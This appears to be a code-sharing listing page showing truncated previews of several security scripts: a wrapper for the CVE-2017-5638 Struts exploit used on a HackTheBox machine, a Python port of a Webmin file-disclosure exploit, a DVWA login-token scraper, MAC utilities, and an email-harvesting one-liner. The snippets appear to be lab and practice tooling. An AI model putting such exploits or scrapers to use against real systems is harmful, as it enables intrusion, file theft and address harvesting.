This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# A semi-interactive shell for the CVE-2017-5638 exploit | |
# (it is actually a wrapper of the CVE-2017-5638 exploit) | |
# which simply makes the shell a bit more functional. | |
# used on HackTheBox, stratosphere machine: http://10.10.10.64/Monitoring/example/Welcome.action | |
if [ ! -z "$1" ]; then | |
url=$1 | |
else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure exploit | |
# python version of the perl exploit found here: | |
# https://www.exploit-db.com/exploits/2017/ | |
import sys | |
from requests import get | |
from requests.exceptions import * | |
from colorama import Fore,Back,Style |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import requests | |
from bs4 import BeautifulSoup | |
url = "http://127.0.0.1/dvwa/login.php" | |
def get_token(source): | |
soup = BeautifulSoup(source, "html.parser") | |
return soup.find('input', { "type" : "hidden" })['value'] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use v5.28; | |
use strict; | |
sub genMAC { | |
my $mac; $mac .= sprintf("%x", rand 16) for 1..12; | |
$mac =~ s/(..)/$1:/g; | |
return $mac =~ s/:$//r; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ $# -lt 1 ]; then | |
echo "getmac.sh <IP>" | |
fi | |
IP=$1 | |
ping_output=$(ping -c1 $IP) | |
mac=ping_output; arp -a | grep $IP | cut -d ' ' -f4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, re, requests | |
for email in list(set(re.findall(r'([^\s":<>]+@[^\s":<>]+[.][^\s":<>]+)', requests.get(sys.argv[1], verify=False).text))): print(email) |